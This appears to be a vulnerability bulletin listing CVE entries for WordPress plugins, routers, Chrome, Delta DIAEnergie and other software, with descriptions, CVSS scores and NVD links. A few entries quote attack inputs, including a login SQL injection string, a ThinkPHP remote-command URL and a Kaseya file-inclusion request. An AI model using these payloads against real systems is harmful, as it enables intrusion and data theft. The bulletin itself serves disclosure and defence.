CVE-2022-0479 The Popup Builder WordPress plugin before 4.1.1 does not sanitise and escape the sgpb-subscription-popup-id parameter before using it in a SQL statement in the All Subscribers admin dashboard, leading to a SQL injection, which could also be used to perform Reflected Cross-Site Scripting attack against a logged in admin opening a malicious link 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-0479
CVE-2022-0679 The Narnoo Distributor WordPress plugin through 2.5.1 fails to validate and sanitize the lib_path parameter before it is passed into a call to require() via the narnoo_distributor_lib_request AJAX action (available to both unauthenticated and authenticated users) which results in the disclosure of arbitrary files as the content of the file is then displayed in the response as JSON data. This could also lead to RCE with various tricks but depends on the underlying system and it's configuration. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-0679
CVE-2022-0784 The Title Experiments Free WordPress plugin before 9.0.1 does not sanitise and escape the id parameter before using it in a SQL statement via the wpex_titles AJAX action (available to unauthenticated users), leading to an unauthenticated SQL injection 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-0784
CVE-2022-0787 The Limit Login Attempts (Spam Protection) WordPress plugin before 5.1 does not sanitise and escape some parameters before using them in SQL statements via AJAX actions (available to unauthenticated users), leading to SQL Injections 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-0787
CVE-2022-0846 The SpeakOut! Email Petitions WordPress plugin before 2.14.15.1 does not sanitise and escape the id parameter before using it in a SQL statement via the dk_speakout_sendmail AJAX action, leading to an SQL Injection exploitable by unauthenticated users 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-0846
CVE-2022-0735 An issue has been discovered in GitLab CE/EE affecting all versions starting from 12.10 before 14.6.5, all versions starting from 14.7 before 14.7.4, all versions starting from 14.8 before 14.8.2. An unauthorised user was able to steal runner registration tokens through an information disclosure vulnerability using quick actions commands. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-0735
CVE-2022-26278 Tenda AC9 v15.03.2.21_cn was discovered to contain a stack overflow via the time parameter in the PowerSaveSet function. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-26278
CVE-2022-26639 TP-LINK TL-WR840N(ES)_V6.20 was discovered to contain a buffer overflow via the DNSServers parameter. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-26639
CVE-2022-26640 TP-LINK TL-WR840N(ES)_V6.20 was discovered to contain a buffer overflow via the minAddress parameter. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-26640
CVE-2021-45865 A File Upload vulnerability exists in Sourcecodester Student Attendance Manageent System 1.0 via the file upload functionality. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2021-45865
CVE-2022-25521 UNNO v03.11.00 was discovered to contain access control issue. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-25521
CVE-2022-25420 NTT Resonant Incorporated goo blog App Web Application 1.0 is vulnerable to CLRF injection. This vulnerability allows attackers to execute arbitrary code via a crafted HTTP request. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-25420
CVE-2022-1073 A vulnerability was found in Automatic Question Paper Generator 1.0. It has been declared as critical. An attack leads to privilege escalation. The attack can be launched remotely. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-1073
CVE-2022-1078 A vulnerability was found in SourceCodester College Website Management System 1.0. It has been classified as critical. Affected is the file /cwms/admin/?page=articles/view_article/. The manipulation of the argument id with an unknown input leads to sql injection. It is possible to launch the attack remotely and without authentication. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-1078
CVE-2022-1080 A vulnerability was found in SourceCodester One Church Management System 1.0. It has been declared as critical. This vulnerability affects code of the file attendancy.php as the manipulation of the argument search2 leads to sql injection. The attack can be initiated remotely. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-1080
CVE-2022-1082 A vulnerability was found in SourceCodester Microfinance Management System 1.0. It has been rated as critical. This issue affects the file /mims/login.php of the Login Page. The manipulation of the argument username/password with the input '||1=1# leads to sql injection. The attack may be initiated remotely. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-1082
CVE-2022-1083 A vulnerability classified as critical has been found in Microfinance Management System. The manipulation of arguments like customer_type_number/account_number/account_status_number/account_type_number with the input ' and sql statement leads to sql injection in multiple files. It is possible to launch the attack remotely. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-1083
CVE-2022-1084 A vulnerability classified as critical was found in SourceCodester One Church Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /one_church/userregister.php. The manipulation leads to authentication bypass. The attack can be launched remotely. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-1084
CVE-2022-23901 A stack overflow re2c 2.2 exists due to infinite recursion issues in src/dfa/dead_rules.cc. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-23901
CVE-2022-0923 Delta Electronics DIAEnergie (All versions prior to 1.8.02.004) has a blind SQL injection vulnerability that exists in HandlerDialog_KID.ashx. This allows an attacker to inject arbitrary SQL queries, retrieve and modify database contents, and execute system commands. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-0923
CVE-2022-25880 Delta Electronics DIAEnergie (All versions prior to 1.8.02.004) has a blind SQL injection vulnerability that exists in DIAE_hierarchyHandler.ashx. This allows an attacker to inject arbitrary SQL queries, retrieve and modify database contents, and execute system commands. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-25880
CVE-2022-25980 Delta Electronics DIAEnergie (All versions prior to 1.8.02.004) has a blind SQL injection vulnerability that exists in HandlerCommon.ashx. This allows an attacker to inject arbitrary SQL queries, retrieve and modify database contents, and execute system commands. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-25980
CVE-2022-26013 Delta Electronics DIAEnergie (All versions prior to 1.8.02.004) has a blind SQL injection vulnerability that exists in DIAE_dmdsetHandler.ashx. This allows an attacker to inject arbitrary SQL queries, retrieve and modify database contents, and execute system commands. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-26013
CVE-2022-26059 Delta Electronics DIAEnergie (All versions prior to 1.8.02.004) has a blind SQL injection vulnerability that exists in GetQueryData. This allows an attacker to inject arbitrary SQL queries, retrieve and modify database contents, and execute system commands. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-26059
CVE-2022-26065 Delta Electronics DIAEnergie (All versions prior to 1.8.02.004) has a blind SQL injection vulnerability that exists in GetLatestDemandNode and GetDemandAnalysisData. This allows an attacker to inject arbitrary SQL queries, retrieve and modify database contents, and execute system commands. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-26065
CVE-2022-26069 Delta Electronics DIAEnergie (All versions prior to 1.8.02.004) has a blind SQL injection vulnerability that exists in HandlerPage_KID.ashx. This allows an attacker to inject arbitrary SQL queries, retrieve and modify database contents, and execute system commands. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-26069
CVE-2022-26338 Delta Electronics DIAEnergie (All versions prior to 1.8.02.004) has a blind SQL injection vulnerability that exists in DIAE_hierarchyHandler.ashx. This allows an attacker to inject arbitrary SQL queries, retrieve and modify database contents, and execute system commands. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-26338
CVE-2022-26349 Delta Electronics DIAEnergie (All versions prior to 1.8.02.004) has a blind SQL injection vulnerability that exists in DIAE_eccoefficientHandler.ashx. This allows an attacker to inject arbitrary SQL queries, retrieve and modify database contents, and execute system commands. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-26349
CVE-2022-26514 Delta Electronics DIAEnergie (All versions prior to 1.8.02.004) has a blind SQL injection vulnerability that exists in DIAE_tagHandler.ashx. This allows an attacker to inject arbitrary SQL queries, retrieve and modify database contents, and execute system commands. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-26514
CVE-2022-26666 Delta Electronics DIAEnergie (All versions prior to 1.8.02.004) has a blind SQL injection vulnerability that exists in HandlerDialogECC.ashx. This allows an attacker to inject arbitrary SQL queries, retrieve and modify database contents, and execute system commands. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-26666
CVE-2022-26667 Delta Electronics DIAEnergie (All versions prior to 1.8.02.004) has a blind SQL injection vulnerability that exists in GetDemandAnalysisData. This allows an attacker to inject arbitrary SQL queries, retrieve and modify database contents, and execute system commands. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-26667
CVE-2022-26836 Delta Electronics DIAEnergie (All versions prior to 1.8.02.004) has a blind SQL injection vulnerability that exists in HandlerExport.ashx/Calendar. This allows an attacker to inject arbitrary SQL queries, retrieve and modify database contents, and execute system commands. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-26836
CVE-2022-26887 Delta Electronics DIAEnergie (All versions prior to 1.8.02.004) has a blind SQL injection vulnerability that exists in DIAE_HandlerTag_KID.ashx. This allows an attacker to inject arbitrary SQL queries, retrieve and modify database contents, and execute system commands. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-26887
CVE-2022-27175 Delta Electronics DIAEnergie (All versions prior to 1.8.02.004) has a blind SQL injection vulnerability that exists in GetCalcTagList. This allows an attacker to inject arbitrary SQL queries, retrieve and modify database contents, and execute system commands. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-27175
CVE-2021-42911 A Format String vulnerability exists in DrayTek Vigor 2960 <= 1.5.1.3, DrayTek Vigor 3900 <= 1.5.1.3, and DrayTek Vigor 300B <= 1.5.1.3 in the mainfunction.cgi file via a crafted HTTP message containing malformed QUERY STRING, which could let a remote malicious user execute arbitrary code. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2021-42911
CVE-2021-43118 A Remote Command Injection vulnerability exists in DrayTek Vigor 2960 1.5.1.3, DrayTek Vigor 3900 1.5.1.3, and DrayTek Vigor 300B 1.5.1.3 via a crafted HTTP message containing malformed QUERY STRING in mainfunction.cgi, which could let a remote malicious user execute arbitrary code. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2021-43118
CVE-2020-24769 SQL injection vulnerability in takeconfirm.php in NexusPHP 1.5 allows remote attackers to execute arbitrary SQL commands via the classes parameter. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2020-24769
CVE-2020-24770 SQL injection vulnerability in modrules.php in NexusPHP 1.5 allows remote attackers to execute arbitrary SQL commands via the id parameter. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2020-24770
CVE-2022-28205 An issue was discovered in MediaWiki through 1.37.1. The CentralAuth extension mishandles a ttl issue for groups expiring in the future. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-28205
CVE-2022-28206 An issue was discovered in MediaWiki through 1.37.1. ImportPlanValidator.php in the FileImporter extension mishandles the check for edit rights. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-28206
CVE-2022-28209 An issue was discovered in Mediawiki through 1.37.1. The check for the override-antispoof permission in the AntiSpoof extension is incorrect. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-28209
CVE-2022-1154 Use after free in utf_ptr2char in GitHub repository vim/vim prior to 8.2.4646. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-1154
CVE-2022-23795 An issue was discovered in Joomla! 2.5.0 through 3.10.6 & 4.0.0 through 4.1.0. A user row was not bound to a specific authentication mechanism which could under very special circumstances allow an account takeover. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-23795
CVE-2022-23797 An issue was discovered in Joomla! 3.0.0 through 3.10.6 & 4.0.0 through 4.1.0. Inadequate filtering on the selected Ids on an request could resulted into an possible SQL injection. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-23797
CVE-2022-23799 An issue was discovered in Joomla! 4.0.0 through 4.1.0. Under specific circumstances, JInput pollutes method-specific input bags with $_REQUEST data. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-23799
CVE-2019-12266 Stack-based Buffer Overflow vulnerability in Wyze Cam Pan v2, Cam v2, Cam v3 allows an attacker to run arbitrary code on the affected device. This issue affects: Wyze Cam Pan v2 versions prior to 4.49.1.47. Wyze Cam v2 versions prior to 4.9.8.1002. Wyze Cam v3 versions prior to 4.36.8.32. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2019-12266
CVE-2019-9564 A vulnerability in the authentication logic of Wyze Cam Pan v2, Cam v2, Cam v3 allows an attacker to bypass login and control the devices.\nThis issue affects:\nWyze Cam Pan v2\nversions prior to 4.49.1.47.\nWyze Cam v2\nversions prior to 4.9.8.1002.\nWyze Cam v3\nversions prior to 4.36.8.32. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2019-9564
CVE-2021-45031 A vulnerability in MEPSAN's USC+ before version 3.0 has a weakness in login function which lets attackers to generate high privileged accounts passwords. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2021-45031
CVE-2021-46007 totolink a3100r V5.9c.4577 is vulnerable to os command injection. The backend of a page is executing the "ping" command, and the input field does not adequately filter special symbols. This can lead to command injection attacks. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2021-46007
CVE-2021-46009 In Totolink A3100R V5.9c.4577, multiple pages can be read by curl or Burp Suite without authentication. Additionally, admin configurations can be set without cookies. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2021-46009
CVE-2022-26645 A remote code execution (RCE) vulnerability in Online Banking System Protect v1.0 allows attackers to execute arbitrary code via a crafted PHP file uploaded through the Upload Image function. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-26645
CVE-2022-26646 Online Banking System Protect v1.0 was discovered to contain a local file inclusion (LFI) vulnerability via the pages parameter. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-26646
CVE-2021-37973 Use after free in Portals in Google Chrome prior to 94.0.4606.61 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. 9.6 https://nvd.nist.gov/vuln/detail/CVE-2021-37973
CVE-2022-0290 Use after free in Site isolation in Google Chrome prior to 97.0.4692.99 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. 9.6 https://nvd.nist.gov/vuln/detail/CVE-2022-0290
CVE-2021-23017 A security issue in nginx resolver was identified, which might allow an attacker who is able to forge UDP packets from the DNS server to cause 1-byte memory overwrite, resulting in worker process crash or potential other impact. 9.4 https://nvd.nist.gov/vuln/detail/CVE-2021-23017
CVE-2020-12740 tcprewrite in Tcpreplay through 4.3.2 has a heap-based buffer over-read during a get_c operation. The issue is being triggered in the function get_ipv6_next() at common/get.c. 9.1 https://nvd.nist.gov/vuln/detail/CVE-2020-12740
CVE-2020-1963 Apache Ignite uses H2 database to build SQL distributed execution engine. H2 provides SQL functions which could be used by attacker to access to a filesystem. 9.1 https://nvd.nist.gov/vuln/detail/CVE-2020-1963
CVE-2021-28918 Improper input validation of octal strings in netmask npm package v1.0.6 and below allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts. 9.1 https://nvd.nist.gov/vuln/detail/CVE-2021-28918
CVE-2021-29102 A Server-Side Request Forgery (SSRF) vulnerability in ArcGIS Server Manager version 10.8.1 and below may allow a remote, unauthenticated attacker to forge GET requests to arbitrary URLs from the system, potentially leading to network enumeration or facilitating other attacks. 9.1 https://nvd.nist.gov/vuln/detail/CVE-2021-29102
CVE-2021-33701 DMIS Mobile Plug-In or SAP S/4HANA, versions - DMIS 2011_1_620, 2011_1_640, 2011_1_700, 2011_1_710, 2011_1_730, 710, 2011_1_731, 710, 2011_1_752, 2020, SAPSCORE 125, S4CORE 102, 102, 103, 104, 105, allows an attacker with access to highly privileged account to execute manipulated query in NDZT tool to gain access to Superuser account, leading to SQL Injection vulnerability, that highly impacts systems Confidentiality, Integrity and Availability. 9.1 https://nvd.nist.gov/vuln/detail/CVE-2021-33701
CVE-2021-43816 containerd is an open source container runtime. On installations using SELinux, such as EL8 (CentOS, RHEL), Fedora, or SUSE MicroOS, with containerd since v1.5.0-beta.0 as the backing container runtime interface (CRI), an unprivileged pod scheduled to the node may bind mount, via hostPath volume, any privileged, regular file on disk for complete read/write access (sans delete). Such is achieved by placing the in-container location of the hostPath volume mount at either `/etc/hosts`, `/etc/hostname`, or `/etc/resolv.conf`. These locations are being relabeled indiscriminately to match the container process-label which effectively elevates permissions for savvy containers that would not normally be able to access privileged host files. This issue has been resolved in version 1.5.9. Users are advised to upgrade as soon as possible. 9.1 https://nvd.nist.gov/vuln/detail/CVE-2021-43816
CVE-2022-0860 Improper Authorization in GitHub repository cobbler/cobbler prior to 3.3.2. 9.1 https://nvd.nist.gov/vuln/detail/CVE-2022-0860
CVE-2022-26960 connector.minimal.php in std42 elFinder through 2.1.60 is affected by path traversal. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths. 9.1 https://nvd.nist.gov/vuln/detail/CVE-2022-26960
CVE-2022-22952 VMware Carbon Black App Control (8.5.x prior to 8.5.14, 8.6.x prior to 8.6.6, 8.7.x prior to 8.7.4 and 8.8.x prior to 8.8.2) contains a file upload vulnerability. A malicious actor with administrative access to the VMware App Control administration interface may be able to execute code on the Windows instance where AppC Server is installed by uploading a specially crafted file. 9.1 https://nvd.nist.gov/vuln/detail/CVE-2022-22952
CVE-2022-26629 An Access Control vulnerability exists in SoroushPlus+ Messenger 1.0.30 in the Lock Screen Security Feature function due to insufficient permissions and privileges, which allows a malicious attacker bypass the lock screen function. 9.1 https://nvd.nist.gov/vuln/detail/CVE-2022-26629
CVE-2022-22374 The BMC (IBM Power 9 AC922 OP910, OP920, OP930, and OP940) may be subject to a firmware downgrade attack which may affect its ability to operate its host. IBM X-Force ID: 221442. 9.1 https://nvd.nist.gov/vuln/detail/CVE-2022-22374
CVE-2022-25577 ALF-BanCO v8.2.5 and below was discovered to use a hardcoded password to encrypt the SQLite database containing the user's data. Attackers who are able to gain remote or local access to the system are able to read and modify the data. 9.1 https://nvd.nist.gov/vuln/detail/CVE-2022-25577
CVE-2022-1106 use after free in mrb_vm_exec in GitHub repository mruby/mruby prior to 3.2. 9.1 https://nvd.nist.gov/vuln/detail/CVE-2022-1106
CVE-2021-45490 The client applications in 3CX on Windows, the 3CX app for iOS, and the 3CX application for Android through 2022-03-17 lack SSL certificate validation. 9.1 https://nvd.nist.gov/vuln/detail/CVE-2021-45490
CVE-2022-24303 Pillow before 9.0.1 allows attackers to delete files because spaces in temporary pathnames are mishandled. 9.1 https://nvd.nist.gov/vuln/detail/CVE-2022-24303
CVE-2022-0249 A vulnerability was discovered in GitLab starting with version 12. GitLab was vulnerable to a blind SSRF attack since requests to shared address space were not blocked. 9.1 https://nvd.nist.gov/vuln/detail/CVE-2022-0249
CVE-2022-26280 Libarchive v3.6.0 was discovered to contain an out-of-bounds read via the component zipx_lzma_alone_init. 9.1 https://nvd.nist.gov/vuln/detail/CVE-2022-26280
CVE-2022-27815 SWHKD 1.1.5 unsafely uses the /tmp/swhkd.pid pathname. There can be an information leak or denial of service. 9.1 https://nvd.nist.gov/vuln/detail/CVE-2022-27815
CVE-2022-27816 SWHKD 1.1.5 unsafely uses the /tmp/swhks.pid pathname. There can be data loss or a denial of service. 9.1 https://nvd.nist.gov/vuln/detail/CVE-2022-27816
 
OTHER VULNERABILITIES
CVE Number Description Base Score Reference
CVE-2010-0127 Adobe Shockwave Player before 11.5.7.609 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted FFFFFF45h Shockwave 3D blocks in a Shockwave file. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2010-0127
CVE-2010-0130 Integer overflow in Adobe Shockwave Player before 11.5.7.609 might allow remote attackers to execute arbitrary code via a crafted .dir (aka Director) file. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2010-0130
CVE-2010-0986 Adobe Shockwave Player before 11.5.7.609 does not properly process asset entries, which allows remote attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via a crafted Shockwave file. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2010-0986
CVE-2010-0987 Heap-based buffer overflow in Adobe Shockwave Player before 11.5.7.609 might allow remote attackers to execute arbitrary code via crafted embedded fonts in a Shockwave file. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2010-0987
CVE-2010-1283 Adobe Shockwave Player before 11.5.7.609 does not properly parse 3D objects in .dir (aka Director) files, which allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a modified field in a 0xFFFFFF49 record. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2010-1283
CVE-2019-9082 ThinkPHP before 3.2.4, as used in Open Source BMS v1.1.1 and other products, allows Remote Command Execution via public//?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= followed by the command. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2019-9082
CVE-2019-9581 phpscheduleit Booked Scheduler 2.7.5 allows arbitrary file upload via the Favicon field, leading to execution of arbitrary Web/custom-favicon.php PHP code, because Presenters/Admin/ManageThemePresenter.php does not ensure an image file extension. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2019-9581
CVE-2019-9810 Incorrect alias information in IonMonkey JIT compiler for Array.prototype.slice method may lead to missing bounds check and a buffer overflow. This vulnerability affects Firefox < 66.0.1, Firefox ESR < 60.6.1, and Thunderbird < 60.6.1. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2019-9810
CVE-2019-11735 Mozilla developers and community members reported memory safety bugs present in Firefox 68 and Firefox ESR 68. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 69 and Firefox ESR < 68.1. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2019-11735
CVE-2019-11740 Mozilla developers and community members reported memory safety bugs present in Firefox 68, Firefox ESR 68, and Firefox 60.8. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 69, Thunderbird < 68.1, Thunderbird < 60.9, Firefox ESR < 60.9, and Firefox ESR < 68.1. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2019-11740
CVE-2019-17340 An issue was discovered in Xen through 4.11.x allowing x86 guest OS users to cause a denial of service or gain privileges because grant-table transfer requests are mishandled. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2019-17340
CVE-2019-18610 An issue was discovered in manager.c in Sangoma Asterisk through 13.x, 16.x, 17.x and Certified Asterisk 13.21 through 13.21-cert4. A remote authenticated Asterisk Manager Interface (AMI) user without system authorization could use a specially crafted Originate AMI request to execute arbitrary system commands. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2019-18610
CVE-2019-13764 Type confusion in JavaScript in Google Chrome prior to 79.0.3945.79 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2019-13764
CVE-2020-6398 Use of uninitialized data in PDFium in Google Chrome prior to 80.0.3987.87 allowed a remote attacker to potentially exploit heap corruption via a crafted PDF file. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2020-6398
CVE-2020-6404 Inappropriate implementation in Blink in Google Chrome prior to 80.0.3987.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2020-6404
CVE-2020-6406 Use after free in audio in Google Chrome prior to 80.0.3987.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2020-6406
CVE-2020-6415 Inappropriate implementation in JavaScript in Google Chrome prior to 80.0.3987.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2020-6415
CVE-2020-6416 Insufficient data validation in streams in Google Chrome prior to 80.0.3987.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2020-6416
CVE-2020-6383 Type confusion in V8 in Google Chrome prior to 80.0.3987.116 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2020-6383
CVE-2020-6384 Use after free in WebAudio in Google Chrome prior to 80.0.3987.116 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2020-6384
CVE-2020-6386 Use after free in speech in Google Chrome prior to 80.0.3987.116 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2020-6386
CVE-2020-6418 Type confusion in V8 in Google Chrome prior to 80.0.3987.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2020-6418
CVE-2020-6422 Use after free in WebGL in Google Chrome prior to 80.0.3987.149 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2020-6422
CVE-2020-6424 Use after free in media in Google Chrome prior to 80.0.3987.149 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2020-6424
CVE-2020-6427 Use after free in audio in Google Chrome prior to 80.0.3987.149 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2020-6427
CVE-2020-6428 Use after free in audio in Google Chrome prior to 80.0.3987.149 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2020-6428
CVE-2020-6429 Use after free in audio in Google Chrome prior to 80.0.3987.149 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2020-6429
CVE-2020-6449 Use after free in audio in Google Chrome prior to 80.0.3987.149 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2020-6449
CVE-2020-9802 A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing maliciously crafted web content may lead to arbitrary code execution. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2020-9802
CVE-2021-21466 SAP Business Warehouse, versions 700, 701, 702, 711, 730, 731, 740, 750, 782 and SAP BW/4HANA, versions 100, 200, allow a low privileged attacker to inject code using a remote enabled function module over the network. Via the function module an attacker can create a malicious ABAP report which could be used to get access to sensitive data, to inject malicious UPDATE statements that could have also impact on the operating system, to disrupt the functionality of the SAP system which can thereby lead to a Denial of Service. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2021-21466
CVE-2020-13936 An attacker that is able to modify Velocity templates may execute arbitrary Java code or run arbitrary system commands with the same privileges as the account running the Servlet container. This applies to applications that allow untrusted users to upload/modify velocity templates running Apache Velocity Engine versions up to 2.2. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2020-13936
CVE-2021-22191 Improper URL handling in Wireshark 3.4.0 to 3.4.3 and 3.2.0 to 3.2.11 could allow remote code execution via via packet injection or crafted capture file. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2021-22191
CVE-2020-36327 Bundler 1.16.0 through 2.2.9 and 2.2.11 through 2.2.16 sometimes chooses a dependency source based on the highest gem version number, which means that a rogue gem found at a public source may be chosen, even if the intended choice was a private gem that is a dependency of another private gem that is explicitly depended on by the application. NOTE: it is not correct to use CVE-2021-24105 for every "Dependency Confusion" issue in every product. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2020-36327
CVE-2021-31215 SchedMD Slurm before 20.02.7 and 20.03.x through 20.11.x before 20.11.7 allows remote code execution as SlurmUser because use of a PrologSlurmctld or EpilogSlurmctld script leads to environment mishandling. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2021-31215
CVE-2021-30117 The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2021-30117
CVE-2021-30121 Semi-authenticated local file inclusion The contents of arbitrary files can be returned by the webserver Example request: `https://x.x.x.x/KLC/js/Kaseya.SB.JS/js.aspx?path=C:\\Kaseya\\WebPages\\dl.asp` A valid sessionId is required but can be easily obtained via CVE-2021-30118 8.8 https://nvd.nist.gov/vuln/detail/CVE-2021-30121
CVE-2021-3653 A flaw was found in the KVM's AMD code for supporting SVM nested virtualization. The flaw occurs when processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested guest (L2). Due to improper validation of the "int_ctl" field, this issue could allow a malicious L1 to enable AVIC support (Advanced Virtual Interrupt Controller) for the L2 guest. As a result, the L2 guest would be allowed to read/write physical pages of the host, resulting in a crash of the entire system, leak of sensitive data or potential guest-to-host escape. This flaw affects Linux kernel versions prior to 5.14-rc7. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2021-3653
CVE-2021-29108 There is an privilege escalation vulnerability in organization-specific logins in Esri Portal for ArcGIS versions 10.9 and below that may allow a remote, authenticated attacker to impersonate another account. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2021-29108
CVE-2021-37970 Use after free in File System API in Google Chrome prior to 94.0.4606.54 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2021-37970
CVE-2021-37972 Out of bounds read in libjpeg-turbo in Google Chrome prior to 94.0.4606.54 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2021-37972
CVE-2021-20039 Improper neutralization of special elements in the SMA100 management interface '/cgi-bin/viewcert' POST http method allows a remote authenticated attacker to inject arbitrary commands as a 'nobody' user. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2021-20039
